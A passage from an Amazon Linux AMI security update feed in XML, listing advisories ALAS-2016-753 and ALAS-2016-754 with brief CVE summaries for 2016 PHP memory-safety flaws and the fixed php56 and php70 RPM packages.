arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-753</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-753: medium priority package update for php56</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7418:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.
1377352:
CVE-2016-7418 php: Null pointer dereference in php_wddx_push_element
CVE-2016-7417:
ext/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data.
1377344:
CVE-2016-7417 php: Missing type check when unserializing SplArray
CVE-2016-7416:
ext/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument.
1377340:
CVE-2016-7416 php: Stack based buffer overflow in msgfmt_format_message
CVE-2016-7414:
The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.
1377336:
CVE-2016-7414 php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile
CVE-2016-7413:
Use-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call.
1377314:
CVE-2016-7413 php: Use after free in wddx_deserialize
CVE-2016-7412:
ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.
1377311:
CVE-2016-7412 php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field
CVE-2016-7411:
ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.
1377303:
CVE-2016-7411 php: Memory corruption when destructing deserialized object
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7411" title="" id="CVE-2016-7411" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7412" title="" id="CVE-2016-7412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7413" title="" id="CVE-2016-7413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7414" title="" id="CVE-2016-7414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7416" title="" id="CVE-2016-7416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7417" title="" id="CVE-2016-7417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7418" title="" id="CVE-2016-7418" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-process" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package 
name="php56-gmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.26" release="1.128.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-pspell-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.26" release="1.128.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-embedded-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.26" 
release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-imap" 
version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.26" release="1.128.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-xml-5.6.26-1.128.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-754</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-754: medium priority package update for php70</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7418:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.
1377352:
CVE-2016-7418 php: Null pointer dereference in php_wddx_push_element
CVE-2016-7417:
ext/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data.
1377344:
CVE-2016-7417 php: Missing type check when unserializing SplArray
CVE-2016-7416:
ext/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument.
1377340:
CVE-2016-7416 php: Stack based buffer overflow in msgfmt_format_message
CVE-2016-7414:
The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.
1377336:
CVE-2016-7414 php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile
CVE-2016-7413:
Use-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call.
1377314:
CVE-2016-7413 php: Use after free in wddx_deserialize
CVE-2016-7412:
ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.
1377311:
CVE-2016-7412 php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7412" title="" id="CVE-2016-7412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7413" title="" id="CVE-2016-7413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7414" title="" id="CVE-2016-7414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7416" title="" id="CVE-2016-7416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7417" title="" id="CVE-2016-7417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7418" title="" id="CVE-2016-7418" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-tidy" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.11" release="1.16.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-embedded-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" 
version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.11" release="1.16.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-debuginfo-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.11" release="1.16.amzn1" 
epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.11" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-common-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.11" release="1.16.amzn1" epoch="0" 